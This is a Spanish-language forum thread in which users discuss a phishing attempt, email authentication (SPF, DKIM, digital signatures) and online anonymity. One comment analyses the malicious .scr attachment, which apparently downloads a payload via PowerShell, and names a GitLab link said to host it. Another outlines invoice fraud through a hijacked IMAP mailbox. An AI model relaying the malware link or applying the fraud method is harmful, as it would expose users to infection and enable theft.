Artículos: comentarios [4007111]

#106 Phising vivido en mis propias carnes

--777905-- — Mon, 09 Dec 2024 16:27:37 +0000

Perdon, en #105 la arquitectura es POWER9 de IBM y no RISC-V.

Y bueno, para el resto virt-manager o Gnome-Boxes con Qemu emulando X86 para cosas Legacy.

» autor: --777905--

#105 Phising vivido en mis propias carnes

--777905-- — Mon, 09 Dec 2024 16:22:36 +0000

En un futuro toda empresa estatal debera usar Guix con configuraciones declaradas y con drivers 100% libre, ego graficas y estaciones Intel o Talos IV, para garantizar la reproducibilidad y trazabilidad.

Que empiecen por el CSIC y guix.gnu.org

Ningun usuario podra abrir nada fuera de su ruta jamas, y todo navegador estara configurado en un manifest.scm con sandbox o "guix container". El usuario solo vera el icono en su escritorio para lanzarlo y nada mas. Y si hay algun problema, rollback del sistema desde GRUB y listo.

Sera el paraiso de DevOps y scheme, quitando la necesidad de usar Docker y demas.
Y la pesadilla de crackers. Modulos de kernel borrados en /etc/config.scm? Hecho. Lo mismo con programas, restringidos a un subconjunto.

Y con la arquitectura Talos II (RISC-V) barres con exploits hechos para X86 y espionaje industrial y militar con IntelME. Que sera caro al principio, no lo niego. Pero la computacion es tuya y no de agencias extranjeras o de corporaciones.

» autor: --777905--

#104 Phising vivido en mis propias carnes

johel — Mon, 09 Dec 2024 12:30:09 +0000

#60 "Cual seria la solucion? Usar correo firmado internamente o tambien tendria tambien el acceso a la firma?
Tambien se podria vigilar si el correo de la secretaria manda correos cuando no esta en su puesto de trabajo."

Cuando te roban la cuenta, la cuenta es la autentica asi que con firma o sin ella va dar igual.
Mirar cuando se envian los correos y desde donde es una de las primeras revisiones que hacen los informaticos, si no coincide la ip de origen ni el horario bloqueas la cuenta de forma preventiva.

» autor: johel

#103 Phising vivido en mis propias carnes

musg0 — Mon, 09 Dec 2024 10:16:52 +0000

#47 Si concuerda dkim/spf ese correo ha salido de un servidor legítimo. Ya si les han robado las credenciales, o les han modificado el DNS no se puede saber desde el destinatario sin consultar con algún administrador de sistemas de la empresa del envío.
Otro problema y es lo que más he visto es robar las credenciales de acceso de alguien que recibe facturas para pagar. Monitorizar sus mensajes en el buzón entrando por imap y borrar mensajes de facturas recibidas. Suplantar esos mismos mensajes cambiando sólo los datos bancarios y subirlos otra vez por imap. Y ya que no se vuelve a comprobar que la firma dkim sea válida una vez el mensaje ha llegado al buzón, prácticamente no queda rastro de la suplantación y el mensaje parece totalmente fiable

» autor: musg0

#102 Phising vivido en mis propias carnes

unomasdelmonton — Mon, 09 Dec 2024 09:58:06 +0000

#100 tienes que mirar las cabeceras del email para ver el servidor que ha enviado el correo. Estás cabeceras siempre están ocultas y tienes que buscar en tu cliente de correo como verlas

En inglés mail headers

Luego tienes que consultar el registro SPF del dominio de la empresa que en teoría ha enviado el email y ver si en esa lista de servidores autorizados aparece el servidor que has visto en las cabeceras del email.

Esto no garantiza que sea 100% seguro de la empresa porque puede haber autorizado a Amazon o MailChimp u otros servidores de correo por alguna razón y que son compartidos por muchos clientes.

Lo que sí garantiza es que si no está o es un correo falso o la empresa lo hace mal en temas de seguridad y no debes fiarte.

» autor: unomasdelmonton

#101 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 20:09:47 +0000

#100 No no, lo respondí en #34 (creo). Esta peña se ha comprado un dominio casi idéntico al que usan habitualmente, han hecho que dicho dominio redirija al dominio principal de la empresa y ya está. No han accedido a su servicio de correo ni nada.

» autor: wildseven23

#100 Phising vivido en mis propias carnes

javiercampos — Sun, 08 Dec 2024 20:00:26 +0000

#92 Por eso le preguntaba a @wildseven23 cuál era su método.

» autor: javiercampos

#99 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 18:05:46 +0000

#96: Pues que casi no presento unos papeles porque no me decía que el fallo era por ese tema, yo creía que funcionaba con Cl@ave PIN.

» autor: mcfgdbbn3

#98 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 17:36:44 +0000

#67 Sí, que el archivo pesase tanto también daba una pista de que algo raro fallaba, ja, ja, ja.

» autor: wildseven23

#97 Phising vivido en mis propias carnes

wildseven23 — Sun, 08 Dec 2024 17:35:36 +0000

#60 Sí, lo he pasado por varios traductores y no se entiende un carajo, ja, ja, ja.

» autor: wildseven23

#96 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 17:16:06 +0000

#95 Sabes en qué consiste?

A qué te refieres con "una mala pasada"?

Es cierto que a diferencia de los clientes de mail la gestión de las firmas digitales en los navegadores es deficiente. Tendrían que mejorarla

» autor: chavi

#95 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 17:12:59 +0000

#93: Sí, una firma digital es lo que te piden para hacer trámites en línea y que la última vez a punto estuvo de jugarme una mala pasada.

» autor: mcfgdbbn3

#94 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 17:12:16 +0000

#91 Eso no siempre es posible

» autor: chavi

#93 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 17:10:47 +0000

#88 Hay gente que casi no sabe usar un correo electrónico y te pones a hablar de algo que yo tampoco sé lo que es.
Ves?
Por eso la firma digital de los email es algo completamente imprescindible.
Sabes en qué consiste?

No entiendo ese rechazo

O sea, a meter un PIN... ¿Y si te lo copian?
Sin la clave privada es inútil.

la única diferencia a si usas firma digital es que si el correo viene firmado digitalmente no crees que el correo viene de la diceccïón que indica: lo sabes con seguridad.
No hay más diferencias.

Repito. Sabes que es una firma digital?

» autor: chavi

#92 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 17:08:44 +0000

#47 No existe un modo fiable y simple. Un mail es simple texto en claro.

» autor: chavi

#91 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:46:55 +0000

#87: Eso solo es para recibir un segundo factor de autenticación. Supongo que te alegraría poder garantizar 100% que cuando recibes la petición en el email de un site sepas con seguridad que viene realmente de ese site.

Te vas al sitio y haces lo que tengas que hacer sin hacer clic en enlaces del correo.

» autor: mcfgdbbn3

#90 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:45:58 +0000

#89: Pues proponla para ti solo.

Otra opción es que crees una segunda Internet con esa medida, si tan buena es seguro que tienes éxito.

» autor: mcfgdbbn3

#89 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 16:45:21 +0000

#85 Precisamente porque soy consciente de eso propongo esta medida.

Pero tú sabes en qué consiste una firma digital, por dios...

» autor: chavi

#88 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:45:14 +0000

#83: DMARC y DKIM

Hay gente que casi no sabe usar un correo electrónico y te pones a hablar de algo que yo tampoco sé lo que es.

Y si las claves privadas que te identifican no son tuyas, estás vendido. Jamás aceptaría algo así, ni debería hacerlo nadie con dos dedos de frente.

Yo lo que propongo es que los únicos correos que lleguen con mi dirección de correo de remitente, sean los enviados desde mi cuenta, si alguien accede a ella, pues mala suerte.

Nada. Están protegidas por un PIN y las anularía inmediatamente. Y la más importante, la del DNIe jamás sale del interior del DNI. No está en el ordenador.

O sea, a meter un PIN... ¿Y si te lo copian?

En ese caso la diferencia es cero. Le bastaría decir "mirad lo que me envió fulanito"...

Si en el correo lo único que pone es "reno_papa_noel@gmail.com" a ver cómo demuestras que es mío.

Para qué le quieres enviar a nadie correos anónimos??? Para amenzarlo o algo?

Porque me sale de las pelotas. ¿Entiendes ya el concepto de "libertad"? La libertad no se justifica con un "para qué", la libertad es un valor en sí misma. Pese a todo ya te he dado algunas razones, como poder hacer consultas sobre asuntos que pueden producir vergüenza a las personas sin que dicha consulta quede asociada a tu persona.

» autor: mcfgdbbn3

#87 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 16:43:35 +0000

#80 Para empezar, para registrarte en muchas páginas necesitas un correo electrónico.
Eso solo es para recibir un segundo factor de autenticación. Supongo que te alegraría poder garantizar 100% que cuando recibes la petición en el email de un site sepas con seguridad que viene realmente de ese site.

Además uedes generar una dirección de email con esas cosas con su clave privada correspondiente.

Y no, no hay que reconfigurar nada pasadas tres semanas.

» autor: chavi

#86 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 16:39:39 +0000

#81 No es el caso

Estoy hablando única y exclusivamente de la firma digital de los correos electrónicos. Punto

Bajo mi punto de vista es algo urgente e imprescindible.

» autor: chavi

#85 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:39:12 +0000

#84: A lo mejor eres tú el que no entiendes que no vives solo en el planeta, ni tampoco eres el único usuario de Internet.

» autor: mcfgdbbn3

#84 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 16:38:11 +0000

#82 Ya meto mi contraseña en el servicio, si tú quieres más seguridad, te la quedas para ti,
Veo que no comprendes la magnitud del problema.
Cuando alguien te suplante y cree un problema grave lo entenderás. O cuando el problema se deba a que te tragues un correo con origen falsificado

» autor: chavi

#83 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 16:36:15 +0000

#78 "Es que ahí es donde está el problema, en que los únicos correos de Gmail que lleguen con mi dirección sean los que yo he enviado."

El único modo de garantizar eso es la firma electrónica. Ni siquiera necesitan salir de servidores de GMail a pesar de mecanismos opcionales como DMARC y DKIM.

Y si las claves privadas que te identifican no son tuyas, estás vendido. Jamás aceptaría algo así, ni debería hacerlo nadie con dos dedos de frente.

Lo de no conseguir usarlo es simplemente porque su uso es minoritario. Una vez configurado (que se puede hacer fácilmente en la misma instalación del sistema) solo es necesario pulsar enviar. Y no es necesario usar PGP, se pueden usar certificados digitales "normales". Como el del DNIe.

La "gente mayor" solo tendría que pulsar en enviar. Como ahora.

¿Y qué ocurriría si te roban el ordenador con tus claves privadas y todo?
Nada. Están protegidas por un PIN y las anularía inmediatamente. Y la más importante, la del DNIe jamás sale del interior del DNI. No está en el ordenador.

Salvo que esos correos se filtren por parte de la persona que los recibe
En ese caso la diferencia es cero. Le bastaría decir "mirad lo que me envió fulanito"...

Para qué le quieres enviar a nadie correos anónimos??? Para amenzarlo o algo?

Y además, sería un paso más a lo que proponen algunos de prohibir el anonimato en Internet,
En absoluto, la firma digital de los emails no tiene nada que ver con el anonimato en internet.

» autor: chavi

#82 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:31:52 +0000

#79: Ya meto mi contraseña en el servicio, si tú quieres más seguridad, te la quedas para ti, a mí no me toques las pelotas, que no todos queremos vivir como tú.

Bloquea los correos sin firmar y déjanos a los demás vivir en paz.

» autor: mcfgdbbn3

#81 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:30:35 +0000

#74: Hay gente que está defendiendo que no exista el anonimato en Internet, o sea, que eso que propones par el correo también se aplique a Menéame. Y por mí tus estándares de seguridad impuestos te los puedes meter por donde tengas sitio.

» autor: mcfgdbbn3

#80 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:29:20 +0000

#75: El correo electrónico tiene muchos más usos que los que tú haces.

Para empezar, para registrarte en muchas páginas necesitas un correo electrónico.

Los email no son públicos. Son intercambios de mensajes privados. Y para mayor privacidad tienes el cifrado
Son procesos cómodos y transparentes. Una vez configurado no es un proceso distinto al envío de un email "normal".

Existen las listas de correo, ahora se usan poco, pero ahí están.
Y eso de que no son públicos... depende de si se filtran los correos que envías o no.

Son procesos cómodos y transparentes. Una vez configurado no es un proceso distinto al envío de un email "normal".
Hasta que te sale algo en plan "pasaron 3 semanas, necesitas reconfigurar todo".

No se está exponiendo públicamente a nadie, solo impidiendo que alguien se pueda hacer pasar otro.
Eso ahora mismo no pasa, tú puedes decir "no confiéis en nadie que diga ser yo si el mensaje no está firmado", y ya está, si alguien se hace pasar por ti y no firma el mensaje sabremos que tú no fuiste. Conmigo me da igual, no voy a usar un estándar tan alto de seguridad cuando tengo otros problemas en la vida que tú parece que no tienes.

» autor: mcfgdbbn3

#79 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 16:27:26 +0000

» autor: chavi

#78 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 16:25:42 +0000

#76: Eso es una locura. De verdad admitirias que cualquiera de los cientos de personas que tengan acceso a las claves se puedan hacer pasar por tí sin tú consentimiento???

Es que ahí es donde está el problema, en que los únicos correos de Gmail que lleguen con mi dirección sean los que yo he enviado.

Y te diré algo más: nunca he sabido cómo usar lo del PGP, siempre me ha parecido un jaleo y he tenido que usar tutoriales cada vez que quería hacer algo. A lo mejor para el que lo inventó es fácil, para mucha gente no lo es. No me imagino a las personas mayores si las toca hacer cosas así para enviar una triste felicitación de navidad a sus familiares.

Que ocurriría si después de una discusión conti jefe de personal le llega un email remitido por tí poniéndolo a partir o amenazándolo...?

¿Y qué ocurriría si te roban el ordenador con tus claves privadas y todo?

Con la firma digital no se facilita ningún tipo de afectación social, porque el email es comunicación PRIVADA, no social

Salvo que esos correos se filtren por parte de la persona que los recibe. Y además, sería un paso más a lo que proponen algunos de prohibir el anonimato en Internet, y que todo tenga que ir con nuestra cara, nombre y apellidos. Yo por mi parte no pienso dar un solo paso atrás.

» autor: mcfgdbbn3

#77 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 15:38:21 +0000

#68 Por otra parte, que te pongan anonimos en el buzón es difícilmente evitable. Pero muy muy indeseable.

Menos para tí, que estarías encantado

» autor: chavi

#76 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 15:35:43 +0000

#68 La firma electrónica la puede poner el proveedor del servicio, por ejemplo, si usas Gmai
Eso es una locura. De verdad admitirias que cualquiera de los cientos de personas que tengan acceso a las claves se puedan hacer pasar por tí sin tú consentimiento???

Estamos locos..

Nunca me opondré al anonimato en Internet
Es que esto no tiene nada que ver con el anonimato en internet. Tiene que ver con la suplantación de identidad y la proteccion tanto del emisor como del receptor.

Que ocurriría si después de una discusión conti jefe de personal le llega un email remitido por tí poniéndolo a partir o amenazándolo...?

Y solo es un ejemplo.

Con la firma digital no se facilita ningún tipo de afectación social, porque el email es comunicación PRIVADA, no social

» autor: chavi

#75 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 15:30:14 +0000

#71 yo en Menéame estoy dando opiniones
Ni el e-mail es menéame ni se usa para dar opiniones. Es un instrumento de intercambio de mensajes personales. Si dejamos que el remitente pueda falsificar su identidad lo que tenemos es lo que hay: basura

o rara vez lo suelo contar a personas reales, especialmente si son muy próximas, por ejemplo, a mis familiares JAMÁS les contaría eso. ¿Te parece bien exponer públicamente...
Los email no son públicos. Son intercambios de mensajes privados. Y para mayor privacidad tienes el cifrado
Son procesos cómodos y transparentes. Una vez configurado no es un proceso distinto al envío de un email "normal".

No se está exponiendo públicamente a nadie, solo impidiendo que alguien se pueda hacer pasar otro.

» autor: chavi

#74 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 15:25:13 +0000

#72 ¿Te parecería bien que los mensajes de Menéame tuvieran todos un código asociado a mi DNI?
No.
Meneame no es el e-mail.
Lo que me parece mal es que puedas mandarme un mensaje con la dirección de mi hermano como remite sin que tenga la posibilidad (para alguien sin conocimientos informáticos) de saber si fue mi hermano o no. Y quien dice mi hermano dice mi banco, mi empresa o un colega.

Aquí no hablamos del "anonimato de la red". Hablamos concretamente del envío de emails.

Y no. No se debe permitir el envío de emails sin firma digital. No hay ninguna razón para hacerlo salvo facilitar el spam y el fraude.

» autor: chavi

#73 Phising vivido en mis propias carnes

lectorcritico — Sun, 08 Dec 2024 15:20:47 +0000

#70 me refero a firma criptografia, que seria "infalsicable" salvo que roben lacontraseña privada.
es.m.wikipedia.org/wiki/Firma_digital

» autor: lectorcritico

#72 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 15:03:21 +0000

#69: ¿Te parecería bien que los mensajes de Menéame tuvieran todos un código asociado a mi DNI?

¿Tu crees que hablaría de los pensamientos intrusivos si tuviera que hacer eso? Y en general, el anonimato de la red permite a la gente hablar de problemas que jamás hablarían si tuvieran que hacerlo dando la cara. A lo mejor tu vida es perfecta, pero la vida de otras personas no lo es. Y lo mismo pasa con otros temas. ¿Si una persona tiene fetichismo por el furry te parece bien exponerla? O si alguien tiene SIDA y quiere preguntar algo. ¿Te parece bien exponer su DNI al público?

Vives en el mundo de la Piruleta.

» autor: mcfgdbbn3

#71 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 14:59:32 +0000

#65 Eso no perjudica absolutamente a nadie con actividades legítimas.

Eso es lo que tú te crees, yo en Menéame estoy dando opiniones que no daría en público porque soy bastante anónimo.

Yo mismo he hablado de que tengo pensamientos intrusivos, eso rara vez lo suelo contar a personas reales, especialmente si son muy próximas, por ejemplo, a mis familiares JAMÁS les contaría eso. ¿Te parece bien exponer públicamente a las personas que cuentan estas cosas y que gracias al anonimato lo pueden contar sin problema? Y eso solo en cuanto a vergüenza social, porque te pueden excluir de procesos de selección laboral si se enteran de que te pasa eso.

» autor: mcfgdbbn3

#70 Phising vivido en mis propias carnes

ochoceros — Sun, 08 Dec 2024 14:59:09 +0000

#60 "No se si hay comunicaciones de voz firmadas, pero deberia haberlas."

Te pueden falsificar el CallerID y usar una voz falsificada en tiempo real. Con un hardware potente y acceso a tu imagen, incluso lo podrían hacer con una vídeoconferencia.

Ante la duda hay que recurrir siempre al "te llamo yo a tu número" y DESCONFIAR si te responde "es que se me ha roto, llámame a este"; de eso nada, le llamas a la empresa y que te pasen con él.

» autor: ochoceros

#69 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 14:58:04 +0000

#54 La firma digital es transparente una vez configurada. Pulsas enviar y listo. Y lo único que hace es garantizar que tú eres el autor del mensaje y no otra persona.

No entiendo que nadie esté en contra de eso

» autor: chavi

#68 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 14:55:55 +0000

#66: Y hay una letra reconocible.

Salvo que hayas usado una regla de letras.

Si permitimos remites falsos en el e-mail no hay modo fiable de comprobar si el remite corresponde con el autor salvo la firma electrónica.

La firma electrónica la puede poner el proveedor del servicio, por ejemplo, si usas Gmail, Google puede poner la suya, asegurando de que ese correo electrónico proviene de Gmail y de esa cuenta.

Cuando te pase algo grave ya cambiarás de opinión

Nunca me opondré al anonimato en Internet. Yo no voy a apoyar el avergonzamiento social de quienes tengan pensamientos minoritarios, siempre que no hagan daño a terceros o se aprovechen de personas inmaduras. Si piensas que yo voy a apoyar que se exponga a las personas con "parafilias raras", opiniones raras o lo que sea, no cuentes conmigo.

» autor: mcfgdbbn3

#67 Phising vivido en mis propias carnes

ochoceros — Sun, 08 Dec 2024 14:55:25 +0000

#33 El fichero .scr está comprimido y está malformado a posta para que declare más espacio del real que usa y así evitar los escaneos. Aún así el contenido aparece sospechosamente limpio.

Dentro de ese fichero tienes el fichero ".rdata" que aparentemente contiene un instalador y librerías de Python, y que casualmente coinciden con el fichero gitlab.com/jjkjsad/khedc/-/blob/main/fuknew512.zip

El código que comentas es trucho y sospechosamente parecido a este: any.run/report/81a52c3035e6bf3f67e1744745216b10f9ca1b5140dabac63eab2c4 que también usa el iwr (Invoke web request) de powershell (como wget o curl) para bajarse un payload malicioso.

Vamos, que no es un Excel

» autor: ochoceros

#66 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 14:53:43 +0000

#64 Si alguien me pone una carta anónima en el buzón no trae un remite falso. Y hay una letra reconocible.

Si permitimos remites falsos en el e-mail no hay modo fiable de comprobar si el remite corresponde con el autor salvo la firma electrónica.

Cuando te pase algo grave ya cambiarás de opinión

» autor: chavi

#65 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 14:50:52 +0000

#62 Si tu proveedor impide la entrada de dichos correos, tampoco tendrán la posibilidad de hacerlo
Exacto. Eso eso es justo lo que pido. Que los servidores de correo no envíen correos sin firma electrónica.

Eso no perjudica absolutamente a nadie con actividades legítimas. No se debe permitir el envío de correos haciéndose pasar por terceras personas.

» autor: chavi

#64 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 14:50:01 +0000

#63: Por si acaso alguien te mete una carta anónima en el buzón, mejor con impresoras que ponen puntitos amarillos, los bolis BIC no los hacen.

» autor: mcfgdbbn3

#63 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 14:48:30 +0000

#58
¿También vas a prohibir la venta de bolígrafos y reglas con letras?
Y por qué habría de hacerlo?

» autor: chavi

#62 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 14:47:31 +0000

#61: Exactamente. No quiero que me puedan mandar mensajes desde direcciones de correo falsas. No quiero que tengan la posibilidad de hacerlo

Si tu proveedor impide la entrada de dichos correos, tampoco tendrán la posibilidad de hacerlo, con la diferencia de que no vas a perjudicar a otras personas que ni son como tú, ni quieren serlo.

También podemos prohibir las bicis porque no tienen ni seguro ni matrícula.

» autor: mcfgdbbn3

#61 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 14:45:22 +0000

#59 ¿Tal vez poder consultar cosas sin que dichas consultas luego sean asociadas a mi persona?
Eso no tiene ninguna relación con el correo electrónico.

El correo electrónico no es lo a ti te de la gana
Obviamente. Ni lo que te de la gana a tí.
El correo electrónico tiene una única utilidad que es el envío de un mensaje desde una dirección de correo origen a una o varias direcciones de correo destino.

Nada más.

si no quieres leer correos sin firmar,
Exactamente. No quiero que me puedan mandar mensajes desde direcciones de correo falsas. No quiero que tengan la posibilidad de hacerlo

Tú por lo visto sí quieres. Tú sabrás por qué

» autor: chavi

#60 Phising vivido en mis propias carnes

lectorcritico — Sun, 08 Dec 2024 13:50:02 +0000

#5 Cual seria la solucion? Usar correo firmado internamente o tambien tendria tambien el acceso a la firma?
Tambien se podria vigilar si el correo de la secretaria manda correos cuando no esta en su puesto de trabajo.

#0 No tengo claro que ha pasado a #0 si se han hecho pasar por una empresa o han infectado una empresa legitima con el sofware que distribuyen.

#11 Con el texto esta clara la necesidad de firmar, porque se pierde casi todo lo que identifica auna persona, caligrafia, ritmo de escritura. Con la voz no pasaba, pero ahora con la IA tambien puede aparentar ser otra persona.
No se si hay comunicaciones de voz firmadas, pero deberia haberlas.

#10 A un numero de la familia le mandaron un mensaje simulando la DGT y lo raro es que buscando el numero tenia 10 años o algo asi. No sé como lo descartaron o no lo esta reutilizando otro usuario.

#26 #32 Si escribes a VTotal, a lo mejor hacen una excepcion por ser tu caso especial/interesante o suben el limite a todos porque ven que se necesita.
Tambien podria usar el Hacha o cortarlo con DD u otra utilidad de linux. Salvo que corte justo por el virus, no debe influir en el escaneo. Tambien puedes cortar solapado, haciendo dos partes un poco mas grande de la mitad.
#33 En traductor deepgl te dice algo? lo hubiese probado si no estuviese en foto.
www.deepl.com/es/translator

» autor: lectorcritico

#59 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 13:09:16 +0000

#57: Estás sugiriendo que te dejen enviar anónimos a cualquier persona de modo impune ?
Con qué objetivo ?

¿Tal vez poder consultar cosas sin que dichas consultas luego sean asociadas a mi persona?

Hablamos de correo electrónico, no de un foro. Es un intercambio entre dos personas.

El correo electrónico no es lo a ti te de la gana. Te digo, si no quieres leer correos sin firmar, no los leas, pero lo que hagan los demás en su vida privada no debería importarte. Métete en tus asuntos y deja en paz a los demás.

Nada de eso tienes que ver con el correo electrónico ni con facilitar la posiibilidad de que puedas enviar mensajes a alguien haciéndote pasar por otra persona. Que es justo lo que quieres.

¿Cómo podría enviar entonces un mensaje a la ONT diciendo que me parece mal que no se puedan excluir receptores, y que luego estos no puedan tomar represalias por estar en contra de los antidisturbios?

» autor: mcfgdbbn3

#58 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 13:06:22 +0000

#56: Estás en contra de ellos ? Permitimos que un banco o tienda pueda trabajar sin https ??

¿A caso el correo electrónico solo se usa para trabajar o para ofrecer servicios?

Si no se obliga a la firma, el correo electrónico es un problema. Y el envío de correos anónimos no es algo que se deba permitir

¿También vas a prohibir la venta de bolígrafos y reglas con letras?

» autor: mcfgdbbn3

#57 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 13:02:12 +0000

#55 La mordaza es no poder comunicarse desde el anonimato
Estás sugiriendo que te dejen enviar anónimos a cualquier persona de modo impune ?
Con qué objetivo ?

Hablamos de correo electrónico, no de un foro. Es un intercambio entre dos personas.

Por ejemplo, poder decir que estoy a favor de que la donación de órganos pueda condicionarse en función del receptor y negar que los antidisturbios puedan recibir mis órganos o mi sangre, y que nadie me pueda perseguir por estas palabras en mi vida real.
Nada de eso tienes que ver con el correo electrónico ni con facilitar la posiibilidad de que puedas enviar mensajes a alguien haciéndote pasar por otra persona. Que es justo lo que quieres.

» autor: chavi

#56 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 12:51:44 +0000

#55 Eliminamos entonces los mecanismos que hay con https ???

Estás en contra de ellos ? Permitimos que un banco o tienda pueda trabajar sin https ??

Si no se obliga a la firma, el correo electrónico es un problema. Y el envío de correos anónimos no es algo que se deba permitir

» autor: chavi

#55 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 12:40:26 +0000

#53: Dos personas particulares enviándose email sin firmar jamás sabrán con seguridad si el correo fué enviado por la persona que creen.

Ya te he dicho una solución muy sencilla: al que no le guste que desactive los correos no firmados.

Pero si tú no eres ninguna de esas dos personas, no tienes que imponerlas tu criterio sobre lo que tienen que hacer en su vida personal, que no es tu vida.

No te metas en las vidas ajenas, no digas a los demás lo que tienen que hacer.

La firma electrónica no es ninguna "mordaza".

La mordaza es no poder comunicarse desde el anonimato como hacemos en Menéame.

A tí te parecerá eso deseable, tú sabrás por qué. A mí me parece tan indeseable que se debería impedir. Y se puede hacer.

Poder expresar tus ideas sin autocensura. Por ejemplo, poder decir que estoy a favor de que la donación de órganos pueda condicionarse en función del receptor y negar que los antidisturbios puedan recibir mis órganos o mi sangre, y que nadie me pueda perseguir por estas palabras en mi vida real.

» autor: mcfgdbbn3

#54 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 12:36:13 +0000

#52: El origen (la dirección de correo) estoy de acuerdo en que sea el que es.

Lo que no estoy de acuerdo es en que haya firmas digitales para cada persona, y que para enviar un correo tengas que andar con certificados digitales, PIN permanente, PIN cl@ve y todo eso, y encima poniendo tu nombre y apellidos reales.

Lo ideal para un servicio de información sexual para adolescentes, por ejemplo, que tengan que poner ahí su nombre real.

» autor: mcfgdbbn3

#53 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 12:35:33 +0000

#49 Si a mi me importa que exista la posibilidad de que alguien se haga pasar por otra persona al enviar un correo pudiéndose evitar

Dos personas particulares enviándose email sin firmar jamás sabrán con seguridad si el correo fué enviado por la persona que creen.

A tí te parecerá eso deseable, tú sabrás por qué. A mí me parece tan indeseable que se debería impedir. Y se puede hacer.

La firma electrónica no es ninguna "mordaza".

Aplicamos lo mismo al https y permitimos certificados falsos?

» autor: chavi

#52 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 12:32:48 +0000

#51 Claro. Para los que envían spam o hacen phising.

Para que otra cosa sirve enviarle un email a alguien con un correo de origen falso ???

» autor: chavi

#51 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 12:30:43 +0000

#50: No tendrá sentido para ti, para otras personas sí lo puede tener.

Sí estoy de acuerdo en que el origen del mensaje tiene que ser el que es, eso de que se pueda manipular es lo que hay que eliminar, pero andar metiendo mi DNI, nombre y apellidos para enviar correos... NO.

» autor: mcfgdbbn3

#50 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 12:17:15 +0000

#45 En un envío de un email ?????

En ningún lado. Nadie debe poder enviar emails de modo anónimo (o sea con dirección de origen falsa). No tiene sentido.

» autor: chavi

#49 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 12:10:35 +0000

#48: Te vuelvo a decir: ¿Qué te importa a ti que dos personas particulares se envíen un correo electrónico anónimo y sin firmar? ¿Te perjudica en tus actividades diarias?

Lo que sí apoyo es que exista una opción de rechazar correos entrantes no firmados. y el que quiera que la active, y el que no que siga como hasta ahora.

Basta de mordazas, si te molesta Internet solo tienes que desconectar el cable de red.

» autor: mcfgdbbn3

#48 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 12:07:54 +0000

#46 "Prohibido prohibir. "
Los cojones. Eso da lugar a una sociedad invivible.

Tú no eres nadie para decidir si dos particulares se envían entre ellos correos con firma digital o sin ella
No. Pero el Parlamento si
Ente sus obligaciones está el asegurar las comunicaciones y hacer que no sea posible que alguien se haga pasar por tu amigo sin que tú no lo sepas si existe la posibilidad.
Y existe

» autor: chavi

#47 Phising vivido en mis propias carnes

javiercampos — Sun, 08 Dec 2024 11:51:13 +0000

"el correo era legítimo y la dirección desde la que se me enviaba existía realmente y salía de los servidores de esta empresa". Por curiosidad, ¿cómo compruebas que un correo viene de los servidores de una empresa?

» autor: javiercampos

#46 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 11:47:48 +0000

#44: Prohibido prohibir. Tú no eres nadie para decidir si dos particulares se envían entre ellos correos con firma digital o sin ella si tú no eres ninguno de esos dos particulares.

» autor: mcfgdbbn3

#45 Phising vivido en mis propias carnes

mcfgdbbn3 — Sun, 08 Dec 2024 11:46:48 +0000

#17: ¿Y el anonimato dónde lo dejas?

Si quieres, no recibas correos que no tengan eso, pero no digas nada de los envíos.

» autor: mcfgdbbn3

#44 Phising vivido en mis propias carnes

chavi — Sun, 08 Dec 2024 11:11:46 +0000

#43 Google debe poner los medios o cerrar el servicio. Es una simple cuestión legal.

Y si tienes que usar una aplicación de correo, la usas.

